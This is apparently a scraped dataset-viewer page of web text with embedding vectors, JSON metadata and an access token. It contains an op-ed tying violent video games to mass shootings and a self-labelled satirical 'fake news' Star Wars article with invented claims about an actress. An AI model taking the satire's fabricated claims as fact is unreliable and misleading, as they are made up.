5073451996,0.024418536573648453,0.011368825100362301,0.06270681321620941,0.0703933909535408,0.009041880257427692,-0.01864858716726303,-0.04429125785827637,-0.06373024731874466,0.05959850177168846,-0.023792961612343788,0.010005194693803787,-0.07142855226993561,0.019135119393467903,-0.0398537740111351,0.017231574282050133,-0.10246124118566513,-0.07395488768815994,-0.06365735828876495,-0.028736265376210213,0.10741852223873138,-0.06974630057811737,-0.026240892708301544,-0.06212667003273964,0.022511137649416924,-0.013544331304728985,0.016518857330083847,-0.0014570446219295263,0.03846209868788719,-0.003886889899149537,-0.0013570153387263417,0.09487638622522354,-0.004627365618944168,-0.007139710243791342,0.02656773291528225,-0.028162257745862007,-0.10040713846683502,0.050648245960474014,0.013145236298441887,-0.0233757421374321,-5.815487824634147e-8,0.03183290734887123,-0.010030029341578484,0.010158909484744072,-0.019015461206436157,0.06418707221746445,-0.030277227982878685,-0.0526958666741848,0.01759006641805172,0.03470275551080704,-0.0021876159589737654,0.04020625725388527,-0.01454691682010889,-0.05542869120836258,-0.020080266520380974,0.009416041895747185,-0.0233675055205822,-0.057535383850336075,0.11500196158885956,-0.021712781861424446,0.05165759474039078,0.0328575074672699,0.10633859783411026,-0.02924664132297039,-0.03187127411365509,0.07265184074640274,-0.011433177627623081,-0.015289059840142727,0.11440543085336685,-0.016330327838659286,0.036185432225465775,-0.004088344052433968,0.0068389540538191795,0.0762762501835823,-0.014269063249230385,-0.04600828140974045,0.036267224699258804,0.0595332570374012,0.022438952699303627,0.009606316685676575,-0.025922242552042007,-0.06366422772407532,-0.031826213002204895,0.019423792138695717,0.054095637053251266,0.041478849947452545,0.011697200126945972,-0.09909714013338089,0.10475031286478043,0.07593736797571182,-0.04149232059717178,0.04961448535323143,-0.004073749762028456,0.02436036989092827,0.04720206931233406,-0.020746644586324692,-0.04693468287587166,-0.0515923798084259,0.018005238845944405,-0.0928092822432518,-0.054857511073350906,0.09342987090349197,-0.08580414205789566,-0.015654776245355606,0.061513811349868774],"string":"[\n -0.02640632912516594,\n -0.028007086366415024,\n 0.05192742496728897,\n 0.0664181262254715,\n 0.01225372962653637,\n -0.012627065181732178,\n 0.04986022412776947,\n 0.08573436737060547,\n 0.021200217306613922,\n 0.019037043675780296,\n 0.04738474637269974,\n 0.055808596312999725,\n 0.06029904633760452,\n -0.09543737024068832,\n 0.008823898620903492,\n -0.05134577304124832,\n 0.046536754816770554,\n -0.008546855300664902,\n -0.0853034034371376,\n 0.0385948084294796,\n 0.040574319660663605,\n -0.05213971808552742,\n -0.11250410974025726,\n 0.06739891320466995,\n -0.006210907828062773,\n -0.05015285313129425,\n -0.032477814704179764,\n -0.05771646276116371,\n -0.08903278410434723,\n -0.020749595016241074,\n -0.026739004999399185,\n -0.028473002836108208,\n 0.027803827077150345,\n 0.07002079486846924,\n 0.03458426520228386,\n 0.03011566586792469,\n 0.06370292603969574,\n -0.008713528513908386,\n -0.018429024145007133,\n 0.018697652965784073,\n 0.039473552256822586,\n -0.019730014726519585,\n 0.0012636891333386302,\n -0.008013760671019554,\n -0.0016619644593447447,\n -0.04469988867640495,\n 0.07134214043617249,\n -0.028469901531934738,\n -0.08996843546628952,\n -0.00811280682682991,\n -0.06430912017822266,\n -0.028583336621522903,\n 0.08394701778888702,\n -0.04895087704062462,\n -0.04048214852809906,\n 0.03781338408589363,\n -0.0037110133562237024,\n -0.054916396737098694,\n 0.037028633058071136,\n 0.01651357114315033,\n 0.013694003224372864,\n -0.029159028083086014,\n -0.061957743018865585,\n -0.0321597084403038,\n 0.053335823118686676,\n 0.027144882827997208,\n 0.027433741837739944,\n -0.03457038477063179,\n 0.03433941304683685,\n 0.09870639443397522,\n 0.12938307225704193,\n -0.16375376284122467,\n -0.018574081361293793,\n 0.020622748881578445,\n -0.012402530759572983,\n -0.02510189265012741,\n 0.0051625617779791355,\n 0.0860970988869667,\n 0.08060262352228165,\n -0.1062512919306755,\n 0.07758917659521103,\n -0.06465406715869904,\n -0.04098138213157654,\n -0.074271060526371,\n -0.0012597755994647741,\n -0.041335541754961014,\n -0.016874782741069794,\n -0.003920051269233227,\n 0.03807878866791725,\n 0.0021096179261803627,\n 0.036819927394390106,\n -0.05430908128619194,\n 0.08684573322534561,\n 0.0015868261689320207,\n 0.039804793894290924,\n 0.009997677057981491,\n -0.026652159169316292,\n -0.0762171819806099,\n -0.03945402428507805,\n 0.08723445981740952,\n -0.02214948832988739,\n 0.12258397787809372,\n -0.08313637226819992,\n -0.014158410020172596,\n 0.017200389876961708,\n -0.07826980948448181,\n 0.01101559679955244,\n 0.01836996152997017,\n -0.09183645248413086,\n 0.017564503476023674,\n -0.008279534988105297,\n 0.04774504527449608,\n -0.03095964342355728,\n 0.024879079312086105,\n 0.026257121935486794,\n 0.030287565663456917,\n -0.007870533503592014,\n 0.012939177453517914,\n -0.000764561234973371,\n 0.004231465980410576,\n 0.08816973119974136,\n 0.08723684400320053,\n 0.011531642638146877,\n 0.0611049123108387,\n -0.0638100653886795,\n 0.03163760527968407,\n -0.14296461641788483,\n 1.627514356712682e-33,\n -0.014231652021408081,\n 0.055240508168935776,\n 0.02118626981973648,\n -0.0257884431630373,\n -0.024814771488308907,\n -0.013241329230368137,\n -0.034803394228219986,\n -0.03677869588136673,\n 0.08752273768186569,\n 0.09379899501800537,\n -0.007575126830488443,\n 0.03499555215239525,\n -0.011726575903594494,\n -0.005476064048707485,\n -0.04312698543071747,\n 0.013269607909023762,\n -0.06920932978391647,\n 0.036450307816267014,\n 0.02146071195602417,\n -0.009224174544215202,\n -0.007206066977232695,\n 0.033938415348529816,\n -0.009891735389828682,\n -0.07671797275543213,\n -0.010316664353013039,\n -0.07212638109922409,\n -0.09846417605876923,\n 0.012374000623822212,\n 0.019291667267680168,\n 0.02674693800508976,\n 0.02499869093298912,\n -0.0278953704982996,\n 0.08264819532632828,\n -0.0248448196798563,\n 0.02591821737587452,\n -0.03686825558543205,\n -0.00782032124698162,\n -0.03990798071026802,\n -0.011659997515380383,\n 0.052068136632442474,\n -0.07081781327724457,\n 0.03834255784749985,\n -0.045134760439395905,\n -0.014567968435585499,\n -0.03638486936688423,\n 0.06586035341024399,\n -0.017019817605614662,\n -0.10078645497560501,\n -0.0652603805065155,\n 0.03763366863131523,\n 0.05508372187614441,\n 0.01757640950381756,\n 0.04559631645679474,\n 0.028500838205218315,\n -0.08246587961912155,\n 0.013911347836256027,\n 0.025294989347457886,\n -0.08666595816612244,\n 0.048176731914281845,\n -0.026318619027733803,\n 0.07139098644256592,\n 0.00980397779494524,\n -0.0232730470597744,\n -0.044286999851465225,\n -0.06112176179885864,\n 0.06268958747386932,\n 0.05636795982718468,\n 0.11333005130290985,\n -0.10516765713691711,\n 0.04082461819052696,\n -0.034090396016836166,\n -0.052349597215652466,\n -0.021281005814671516,\n -0.00208142027258873,\n -0.0826525166630745,\n -0.04847050458192825,\n -0.020573850721120834,\n 0.0693574994802475,\n 0.034913070499897,\n -0.0392347127199173,\n 0.0465833842754364,\n -0.060765136033296585,\n 0.07919066399335861,\n 0.01876811496913433,\n -0.027082553133368492,\n 0.06762140244245529,\n 0.05150572210550308,\n 0.008251409977674484,\n 0.011735877022147179,\n 0.028023360297083855,\n -0.023875046521425247,\n 0.005642393138259649,\n 0.049145977944135666,\n 0.03970032557845116,\n -0.06133975461125374,\n -3.931788729184587e-33,\n -0.12444168329238892,\n -0.052530109882354736,\n -0.024028973653912544,\n -0.019837280735373497,\n -0.07658461481332779,\n 0.018649261444807053,\n -0.003711588215082884,\n -0.03938690945506096,\n -0.011678295210003853,\n -0.03445162624120712,\n -0.07803136110305786,\n 0.002259747125208378,\n -0.026788044720888138,\n -0.02906748466193676,\n -0.06414967030286789,\n -0.023572422564029694,\n 0.024142013862729073,\n -0.04614557698369026,\n 0.016691623255610466,\n -0.04375031962990761,\n 0.1263701617717743,\n -0.013303807005286217,\n 0.005363434087485075,\n 0.08196049183607101,\n -0.048135027289390564,\n 0.023747306317090988,\n 0.027655327692627907,\n -0.015244862996041775,\n -0.03062966838479042,\n -0.015211929567158222,\n 0.02048763632774353,\n 0.04545187950134277,\n 0.040107544511556625,\n -0.007064875680953264,\n -0.04278544709086418,\n -0.029671685770154,\n 0.009326416999101639,\n -0.010978156700730324,\n -0.04806367680430412,\n -0.047009117901325226,\n -0.03821489214897156,\n 0.020176690071821213,\n -0.04172474890947342,\n 0.013082458637654781,\n 0.010673695243895054,\n 0.04864172264933586,\n 0.020580526441335678,\n -0.07293606549501419,\n 0.07025666534900665,\n 0.0189686082303524,\n -0.04905810207128525,\n -0.08965367078781128,\n 0.0381360724568367,\n 0.1304779350757599,\n -0.09198053181171417,\n -0.013447605073451996,\n 0.024418536573648453,\n 0.011368825100362301,\n 0.06270681321620941,\n 0.0703933909535408,\n 0.009041880257427692,\n -0.01864858716726303,\n -0.04429125785827637,\n -0.06373024731874466,\n 0.05959850177168846,\n -0.023792961612343788,\n 0.010005194693803787,\n -0.07142855226993561,\n 0.019135119393467903,\n -0.0398537740111351,\n 0.017231574282050133,\n -0.10246124118566513,\n -0.07395488768815994,\n -0.06365735828876495,\n -0.028736265376210213,\n 0.10741852223873138,\n -0.06974630057811737,\n -0.026240892708301544,\n -0.06212667003273964,\n 0.022511137649416924,\n -0.013544331304728985,\n 0.016518857330083847,\n -0.0014570446219295263,\n 0.03846209868788719,\n -0.003886889899149537,\n -0.0013570153387263417,\n 0.09487638622522354,\n -0.004627365618944168,\n -0.007139710243791342,\n 0.02656773291528225,\n -0.028162257745862007,\n -0.10040713846683502,\n 0.050648245960474014,\n 0.013145236298441887,\n -0.0233757421374321,\n -5.815487824634147e-8,\n 0.03183290734887123,\n -0.010030029341578484,\n 0.010158909484744072,\n -0.019015461206436157,\n 0.06418707221746445,\n -0.030277227982878685,\n -0.0526958666741848,\n 0.01759006641805172,\n 0.03470275551080704,\n -0.0021876159589737654,\n 0.04020625725388527,\n -0.01454691682010889,\n -0.05542869120836258,\n -0.020080266520380974,\n 0.009416041895747185,\n -0.0233675055205822,\n -0.057535383850336075,\n 0.11500196158885956,\n -0.021712781861424446,\n 0.05165759474039078,\n 0.0328575074672699,\n 0.10633859783411026,\n -0.02924664132297039,\n -0.03187127411365509,\n 0.07265184074640274,\n -0.011433177627623081,\n -0.015289059840142727,\n 0.11440543085336685,\n -0.016330327838659286,\n 0.036185432225465775,\n -0.004088344052433968,\n 0.0068389540538191795,\n 0.0762762501835823,\n -0.014269063249230385,\n -0.04600828140974045,\n 0.036267224699258804,\n 0.0595332570374012,\n 0.022438952699303627,\n 0.009606316685676575,\n -0.025922242552042007,\n -0.06366422772407532,\n -0.031826213002204895,\n 0.019423792138695717,\n 0.054095637053251266,\n 0.041478849947452545,\n 0.011697200126945972,\n -0.09909714013338089,\n 0.10475031286478043,\n 0.07593736797571182,\n -0.04149232059717178,\n 0.04961448535323143,\n -0.004073749762028456,\n 0.02436036989092827,\n 0.04720206931233406,\n -0.020746644586324692,\n -0.04693468287587166,\n -0.0515923798084259,\n 0.018005238845944405,\n -0.0928092822432518,\n -0.054857511073350906,\n 0.09342987090349197,\n -0.08580414205789566,\n -0.015654776245355606,\n 0.061513811349868774\n]"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":12,"numItemsPerPage":100,"numTotalItems":8013769,"offset":1200,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjY2Nzc0Mywic3ViIjoiL2RhdGFzZXRzL2xzYi9vcGVud2VidGV4dC1hbGwtbWluaWxtLWw2LXYyLWVtYmVkZGluZyIsImV4cCI6MTc1NjY3MTM0MywiaXNzIjoiaHR0cHM6Ly9odWdnaW5nZmFjZS5jbyJ9.ET-FPF4J9Vkn-oplm0s_dfSmL7oDUl0WTR3NS6Z39y2bOqbVlC1teh7emCLELeJNqxXKX6k_XpGnY3sMqBf6BQ","displayUrls":true},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
text
stringlengths
316
100k
embedding
list
Whatever else is said about the murder of 20 elementary school children in Newtown, Conn. last year, let no one say – especially at the Senate Judiciary Committee hearings on gun control today – that those killings were “unimaginable.” Every day, mass killings are imagined, rehearsed, and enacted – virtually – by millions of children and young adults, mostly boys and men, in violent video games. One segment of Bioshock 2, for example, invites players to kill defenseless, cowering girls (called Little Sisters) or lure them into a trap where they are mowed down by a machine gun. Adam Lanza didn’t have to imagine the Sandy Hook massacre on his own. Others had already imagined it for him. When Wayne LaPierre, head of the National Rifle Association, pointed a finger at video games and media violence during a news conference after the shootings, it was a calculated effort to distract attention from the gun industry and its powerful lobby. As former Congresswoman Gabrielle Giffords and her husband Mark Kelly wrote in their USA Today op-ed announcing the launch of their gun-control superPAC, "We saw from the NRA leadership's defiant and unsympathetic response to the Newtown, Conn., massacre that winning even the most common-sense reforms will require a fight." But Mr. LaPierre was also half right. Glock and Bushmaster give troubled teens and young adults like Lanza the means to kill. But antisocial video games and a wider culture of militarism give them the script. What LaPierre neglected to say is that the arms industry, the video game industry, and the military are deeply entwined with one another and even, one could argue, allied in values. In many ways, their work together is eroding the distinction between virtual and real killing. During the Iraq War, Marines relaxed after conducting search and destroy missions by playing Call of Duty 4 and CounterStrike, fielding the same weapons and tactics. CIA agents and Air Force personnel today kill real people in distant countries using remotely piloted drones, on interfaces modeled on video games, while US soldiers hone tactical combat skills on video game simulators and use Xbox joysticks to control real machines in the battlefield. Meanwhile, the video game industry works closely with the military and gun manufacturers to ensure that their virtual weaponry, from the PM-63 submachine gun to the C-130 gunship, behaves just like the real thing. Some game companies have direct contracts with the Department of Defense, manufacturing hardware and software for military applications. It’s easy to see why the US Army runs recruitment ads in gamer magazines and maintains a popular online game called America’s Army. While the industry denies any link between violent interactive media and real-world beliefs and behaviors, studies have shown that playing violent video games is associated with higher rates of hostility, more pro-violence attitudes, and a decrease in players’ ability to empathize with others, particularly those who are suffering. Computer video games are in fact the most powerful medium ever devised for altering perception and behavior. That’s why psychologists use them to help patients overcome post-traumatic stress disorder (PTSD), why pilots are trained on flight simulators, and why the military uses them to train soldiers. So what does it mean that millions of boys and young men are spending their free time “training” to kill? Whether knifing or setting fire to prostitutes in Grand Theft Auto, or mowing down scores of racially stereotyped Arabs in some fictional Middle Eastern country, male video-game players are being taught to associate representations of mass slaughter, torture, and other antisocial acts with play and pleasure. They are being told that to be a “real” man is to come to others heavily armed. The very idea of moving from room to room with an assault weapon, “clearing” the room by shooting victims in the head, as Lanza did in Newtown, is a convention of the First Person Shooter video game genre. The first such game, Doom, proved so successful at teaching soldiers how to kill that the Marines quickly adapted it for their training program. Prior to their massacre, the Columbine killers spent countless hours playing and even designing levels on a modified version of the same game. At his trial last year, Anders Breivik, the Norwegian extremist who murdered 69 people, most of them teenagers, on the island of Utoya, boasted that he had done his weapons training on the military-style First Person Shooter game, Call of Duty: Modern Warfare, which he had played for up to 16 hours a day as “part of my training-simulation.” The special gun sight Breivik installed on his rifle was the real version of the virtual one he had used in the game. The Breivik case reveals how narrow the US debate over gun violence really is. Norway has stringent gun control laws, and Breivik did his killing with a hunting rifle, not a semi-automatic assault rifle. So tightening restrictions on guns, in a nation that already has hundreds of millions of them in private hands, is both admirable and arguably beside the point. Banning guns alone won’t address a pervasive culture of militarism and violence – one that has diminished the ability of children and young adults to distinguish between real and virtual violence, or to care about the difference. Despite a landmark Supreme Court decision in 2011, which protected commercial video games as free speech, the Newtown massacre has renewed debate in the Congress and White House over what, if anything, should – or can – be done to regulate the $60 billion video game industry, the largest media business in the world. To his credit, President Obama recently ordered more federal research on possible links between violent video games and real-life violence, and asked Congress to fund it. But he declined to take stronger action. Two weeks ago, Vice President Joe Biden, who had earlier expressed concern about violent video games, suddenly backed down, after intense lobbying pressure from the industry. He and others seem to have accepted the industry's position that the research linking violent video games to real violence is too "inconclusive" to justify new legislative action. The industry is fond of saying that no one has yet been able to prove that a specific act of violence was "caused" by someone playing a video game. However, that's like my claiming that cars don't contribute to global warming, because no one has proved that my own SUV has caused the glaciers on Kilimanjaro to melt. The sources of climate change, and of violence, are in fact multiple. Video games may not cause violence on their own, but they contribute to a culture of violence by modeling antisocial acts and diminishing players' empathic response to others. They also promote a virulent militarism that subordinates democratic and civic values to a culture of war-making. And here, perhaps, lies the rub. A cynic might ask whether a deliberative body that routinely authorizes billions of dollars for real-world weapons, real-life wars that in just the last decade have left more than 100,000 real people, not virtual ones, dead, is terribly likely to go after an industry that spreads only make-believe violence. Let us give our elected representatives the benefit of the doubt, and assume that they would. Even so, it is not far-fetched to ask whether our representatives' reluctance to rein in the industry might not stem, at least in part, from their tacit appreciation of how deeply entwined cultures of symbolic violence now are with our national identity and self-understanding as a great military power. Yet a nation that lives by the sword dies by it, and it matters less and less whether that sword is virtual or real. So long as America continues socializing its young people in a culture of violence and war, whether in video games or in military campaigns abroad, we are unlikely to see an end to tragedies like Newtown or Aurora. John Sanbonmatsu teaches a course on the Philosophy and Ethics of Video Games at Worcester Polytechnic Institute, where he is associate professor of philosophy.
[ 0.03001212328672409, -0.03125855326652527, -0.062425535172224045, -0.002632936229929328, 0.08750056475400925, 0.05508522689342499, 0.07722733914852142, 0.04582606628537178, 0.038352519273757935, 0.09423366189002991, 0.03974948078393936, 0.09418023377656937, 0.02635328285396099, -0.0016106822295114398, -0.012334587052464485, 0.010158107616007328, 0.08923215419054031, 0.005583283957093954, -0.04733528941869736, 0.035553283989429474, 0.004674986470490694, 0.00888284482061863, 0.08914224803447723, 0.0370350182056427, -0.06675929576158524, 0.013451178558170795, -0.003529816400259733, 0.05447312444448471, -0.10710353404283524, 0.031133277341723442, 0.059383783489465714, -0.09323975443840027, -0.014653864316642284, 0.04205133765935898, 0.028223389759659767, -0.04180258512496948, 0.068921759724617, 0.053687483072280884, -0.01797187142074108, -0.07297708094120026, -0.006192564032971859, -0.03165498375892639, 0.007529080845415592, -0.04777216166257858, 0.05029328539967537, -0.040373608469963074, -0.07792648673057556, -0.002466720761731267, -0.01200446579605341, -0.04314253479242325, -0.030050819739699364, -0.08023267984390259, -0.01435898244380951, -0.03331049531698227, 0.04783812165260315, -0.06687934696674347, 0.007971959188580513, 0.00411577895283699, 0.0733586922287941, 0.011182055808603764, 0.000009073217370314524, -0.06424243748188019, -0.03757425770163536, -0.017000049352645874, 0.05967335030436516, 0.010853242129087448, 0.05864489823579788, -0.03207175061106682, 0.09711220115423203, 0.09236150979995728, 0.05798529461026192, 0.0440920814871788, 0.03823280334472656, 0.0503791943192482, -0.048359282314777374, 0.008525165729224682, 0.02142324484884739, 0.07592912763357162, 0.06956920027732849, -0.005170457996428013, 0.08325258642435074, -0.10796350985765457, 0.0420248843729496, -0.06212230771780014, -0.008460716344416142, 0.004064556676894426, -0.039843738079071045, -0.047304462641477585, 0.018913036212325096, -0.00035800741170533, -0.17857185006141663, 0.04748757183551788, 0.08148407936096191, 0.013029244728386402, 0.06687460094690323, -0.0746772438287735, -0.10276259481906891, 0.006465845741331577, -0.11331308633089066, -0.006800077389925718, -0.03437895327806473, 0.011230634525418282, 0.008981546387076378, -0.06444036960601807, 0.03330398350954056, -0.00025064992951229215, -0.036665722727775574, 0.0017757435562089086, -0.08471956849098206, -0.0014114127261564136, -0.07019531726837158, 0.07596299797296524, -0.0035378215834498405, 0.017731688916683197, 0.07874682545661926, -0.017819641157984734, 0.03747977316379547, 0.04481426998972893, -0.04894411936402321, -0.019198523834347725, 0.07445976883172989, 0.015905817970633507, -0.09356198459863663, 0.038541022688150406, 0.05769522115588188, 0.011138459667563438, -0.10727734863758087, 3.092288132709742e-33, 0.035343315452337265, 0.017052054405212402, 0.01417363341897726, 0.0043383496813476086, 0.08043114840984344, -0.00851566530764103, -0.011500137858092785, -0.06255155801773071, 0.0393010750412941, 0.05939529463648796, -0.004931610077619553, -0.08341415226459503, 0.009764308109879494, 0.0018324702978134155, 0.0338636077940464, -0.0037003334145992994, -0.07076801359653473, -0.024579666554927826, -0.023487770929932594, 0.04088367149233818, -0.03784126415848732, 0.06507274508476257, -0.023783206939697266, 0.04478432983160019, -0.025515299290418625, 0.04823855683207512, -0.01394280418753624, 0.10836844891309738, 0.029315032064914703, -0.0019389973022043705, -0.033213067799806595, 0.027025839313864708, -0.008593819104135036, -0.03592267632484436, 0.10065101087093353, -0.11158621311187744, 0.04469279944896698, 0.0017709234962239861, -0.00043020688463002443, 0.08435169607400894, 0.08807914704084396, 0.03925153985619545, -0.08336886763572693, -0.01684379018843174, -0.04504162445664406, 0.0002667878579813987, 0.013749131932854652, -0.005578218027949333, -0.06794323772192001, 0.00935172475874424, 0.0677698478102684, 0.010489869862794876, 0.004311994183808565, -0.005848553031682968, -0.03607030585408211, 0.06029737740755081, -0.043308790773153305, -0.08278274536132812, 0.05706285685300827, -0.026139508932828903, 0.05336039885878563, 0.0037594232708215714, 0.02690751478075981, 0.0054965452291071415, -0.09421990066766739, -0.03713654354214668, 0.09127455204725266, 0.05800671502947807, 0.017938802018761635, 0.012429089285433292, 0.03795024752616882, 0.01303586084395647, -0.009146507829427719, -0.060768432915210724, -0.04392454773187637, -0.008036554791033268, 0.030927415937185287, 0.01377958245575428, -0.010616013780236244, 0.015546374022960663, 0.06133337318897247, 0.023717001080513, 0.06138099730014801, -0.03367479890584946, -0.10631798207759857, -0.05045253038406372, -0.022159522399306297, -0.07604333758354187, -0.014021972194314003, 0.01053923461586237, -0.08029057085514069, -0.04696115851402283, -0.005155268590897322, 0.02255215309560299, -0.08538278937339783, -4.4805418182430785e-33, -0.027052706107497215, -0.048509784042835236, -0.04939159378409386, 0.05583673715591431, -0.0030076203402131796, -0.01651393435895443, -0.04520826041698456, -0.14208455383777618, 0.1310635656118393, -0.021546034142374992, 0.0061832694336771965, -0.013863038271665573, -0.0002549300843384117, 0.047450289130210876, 0.0401606410741806, -0.06484310328960419, 0.019472777843475342, -0.04493340849876404, -0.027377719059586525, -0.06345897912979126, 0.06998979300260544, 0.030922606587409973, -0.01181322056800127, 0.003063692944124341, 0.08387039601802826, -0.012212338857352734, 0.0014302642084658146, 0.03579597547650337, 0.03917907550930977, 0.029475988820195198, 0.02511606551706791, 0.029284384101629257, 0.0661887675523758, 0.03923051804304123, -0.026556022465229034, 0.04478061944246292, 0.07753752171993256, -0.009250667877495289, 0.011688817292451859, -0.054831746965646744, 0.06271924078464508, 0.05241354554891586, -0.1316000074148178, 0.036439184099435806, -0.07241743057966232, 0.008815547451376915, 0.08226844668388367, 0.06471055746078491, -0.03885114565491676, 0.015203182585537434, -0.10006685554981232, -0.0022833405528217554, -0.06893603503704071, -0.01847964897751808, -0.05362972989678383, -0.001999365398660302, 0.025074725970625877, -0.06095781922340393, 0.019522346556186676, 0.030704233795404434, 0.023064639419317245, -0.05389378219842911, -0.1365651935338974, -0.039422519505023956, 0.046864986419677734, 0.026854559779167175, -0.06881510466337204, -0.044633541256189346, -0.018611382693052292, 0.01549765095114708, 0.005463428795337677, 0.0019308632472530007, 0.0007141992100514472, 0.0353504940867424, -0.09224750101566315, 0.052968334406614304, -0.07579111307859421, 0.03269056975841522, -0.11681617051362991, 0.02514318749308586, -0.0015399613184854388, -0.08612986654043198, -0.023365657776594162, 0.007308515720069408, -0.009044388309121132, 0.07653983682394028, -0.004105644300580025, 0.000686965009663254, -0.02088654786348343, 0.027492156252264977, -0.05260089784860611, -0.11753450334072113, 0.050018489360809326, 0.021207137033343315, -0.13632258772850037, -5.7640242800971464e-8, 0.029730310663580894, 0.014904332347214222, -0.030879292637109756, -0.01149044930934906, 0.0127016082406044, 0.0748375803232193, -0.010262933559715748, 0.02382982149720192, 0.07526877522468567, 0.08557640016078949, -0.014904476702213287, 0.03449644893407822, -0.01930784247815609, 0.006879840511828661, 0.013732142746448517, 0.03133787214756012, 0.014455174095928669, -0.0465681217610836, -0.035592056810855865, 0.014433779753744602, 0.026286380365490913, 0.041788309812545776, -0.0021884837187826633, 0.012257395312190056, 0.04720945283770561, -0.02977157011628151, -0.05509746074676514, 0.03546416759490967, -0.10086748749017715, 0.07981358468532562, -0.0348580963909626, -0.01874416694045067, -0.06189150735735893, -0.06372314691543579, -0.01289308164268732, -0.011885910294950008, 0.07685382664203644, 0.09527374058961868, 0.062067821621894836, 0.0016012247651815414, -0.019040962681174278, -0.015074172988533974, 0.024418368935585022, 0.03580782935023308, -0.013571585528552532, -0.009659980423748493, -0.047500528395175934, -0.05435887351632118, 0.02254461869597435, 0.04671228304505348, -0.03363274782896042, 0.015534644015133381, -0.0685201957821846, -0.009195866994559765, 0.07602870464324951, 0.005980739835649729, -0.002189038088545203, 0.00154816301073879, 0.01940663531422615, -0.03571667894721031, 0.03205994889140129, -0.024811269715428352, -0.025432592257857323, -0.024642879143357277 ]
In a recent interview, Billie Lourd revealed she will be back and bigger than ever in the upcoming Star Wars: Episode VIII. Lourd’s character, Kaydel Ko Connix, spoke one line to her mother’s character in The Force Awakens and now Lourd promises more from Connix in the next installment in the saga films. A FSW correspondent was able to catch up with Lourd following her interview and asked her to elaborate on what she referred to as a role that’s “bigger than ever.” Billie revealed that not only will her role be bigger and meatier this time around but Connix herself will be bigger and meatier. Lourd elaborated that Connix will be pregnant in Episode VIII, carrying the child of a certain lead character. Billie refused to comment any further out of fear of being arrested but confirmed the baby does not belong to First Order characters Hux, Snoke, or Kylo Ren. SPECULATION TIME FAKERS! Now lets figure out whose child Lieutenant Connix carries. Our choices are: Poe Dameron – The obvious choice is the most eligible bachelor in the Resistance. Poe’s got the looks, the swagger, and he’s the best freaking pilot in the galaxy. The only thing harming this theory is the fact Poe may be gay with feelings for Finn. Finn – We only suggest Finn because Billie said it was a lead character. However, Finn would have just recently joined the Resistance by the time of Episode VIII and wouldn’t have been available to get it on with Connix before being put into a coma by Kylo Ren. We doubt Finn is the father. “Snap” Wexley – We all know that Snap’s reconnaissance skills are top-notch, so it seems likely he will have done his work sorting out the eligible ladies to carry on the snap seed for generations of rebels to come. Plus it just sounds cool to say, “My daddy Snap has done recon on bases bigger than your daddy.” Benicio del Toro’s “man in black” – It’s not completely outside the realm of possibilities to assume that del Toro will play a baby daddy Latino lover in Star Wars, given the new bent of Disney trying to represent ethnic groups in their films in a diverse way. In this theory, del Toro plays a poor campesino fruit farmer who illegally immigrates to galactic headquarters and impregnates his young wife citizen to get a residency card. Crimson Corsair – The Crimson Corsair and his savoire-fair. ‘Nuff said? That’s our shortlist for who might be Lieutenant Connix’s baby daddy. Whomever it is is going to have their hands full juggling a newborn along with their regular responsibilities. Good luck to all the men in question! Whom do you think is the father? Let is know in the comments sectiom below! As always, keep it locked to FakingStarWars.net for the latest and fakest news from a galaxy far, far away. -Voxx Please follow and like Faking Star Wars:
[ -0.07405760884284973, -0.08346345275640488, 0.033860281109809875, -0.03428041189908981, 0.005868838634341955, 0.022851835936307907, 0.04051319137215614, 0.10828529298305511, -0.024206481873989105, 0.039409078657627106, 0.03409748151898384, -0.04337087646126747, -0.020965196192264557, -0.025219542905688286, -0.035394154489040375, -0.034919753670692444, 0.08490786701440811, -0.05103692039847374, -0.006100422237068415, 0.05302003398537636, 0.012771261855959892, -0.037504181265830994, 0.027470046654343605, 0.033042676746845245, 0.05872049555182457, -0.03064775839447975, 0.0015878230333328247, -0.01385447010397911, -0.03845741227269173, -0.08855240046977997, 0.0059532281011343, 0.11432550847530365, -0.04369901865720749, 0.01809714548289776, -0.06016802415251732, 0.019550884142518044, 0.041331153362989426, 0.057033635675907135, 0.08855313062667847, -0.03188836947083473, -0.03117658942937851, -0.07552386075258255, -0.0379934161901474, 0.06327500939369202, -0.004443719983100891, -0.08651631325483322, 0.008355307392776012, -0.05824844911694527, 0.020127229392528534, 0.04310835525393486, -0.02188020758330822, -0.0812973827123642, 0.07189592719078064, 0.053369779139757156, 0.04405524581670761, 0.02508331462740898, -0.031451258808374405, -0.06341341882944107, 0.029231425374746323, -0.01939953863620758, -0.10014138370752335, 0.02536490559577942, -0.003755975514650345, -0.01484212838113308, -0.009451824240386486, -0.04634688422083855, 0.047289926558732986, -0.046538013964891434, 0.006795139517635107, 0.006162853911519051, 0.06995747983455658, 0.09965052455663681, 0.009577559307217598, 0.011947990395128727, 0.04329921677708626, 0.03990040719509125, 0.061755042523145676, 0.053638506680727005, 0.07196202129125595, -0.07876543700695038, -0.0041390289552509785, 0.03895636275410652, 0.003994919825345278, 0.04223944619297981, 0.021756917238235474, 0.00923505611717701, 0.003127338830381632, -0.09350328147411346, -0.018938850611448288, 0.007120357360690832, -0.10366754978895187, -0.0028345270548015833, 0.03952648863196373, 0.01331943366676569, 0.038368452340364456, -0.015006812289357185, -0.08416925370693207, 0.0341000035405159, -0.04293118789792061, 0.019591964781284332, 0.051253385841846466, 0.039609022438526154, 0.03997928276658058, 0.05788407102227211, -0.040672704577445984, -0.07112423330545425, 0.09087878465652466, -0.11440464854240417, 0.006946878507733345, -0.019616417586803436, 0.007808038964867592, -0.09450066089630127, 0.06388326734304428, -0.006243669427931309, 0.02990327961742878, 0.014186636544764042, 0.019202720373868942, 0.03237365931272507, -0.008964383974671364, -0.11271704733371735, 0.017262542620301247, 0.07734616100788116, -0.01132024172693491, 0.040155645459890366, 0.02663498930633068, 0.001807592692784965, -0.04401005432009697, 5.1300513035563484e-33, -0.02713017351925373, 0.01932368054986, 0.010991263203322887, 0.12514843046665192, -0.004819806199520826, 0.05674978345632553, 0.04692840948700905, 0.061370328068733215, -0.050362490117549896, -0.029532194137573242, -0.15945465862751007, -0.06804787367582321, -0.05367962643504143, -0.042325958609580994, 0.04670755937695503, 0.10170043259859085, 0.013573161326348782, 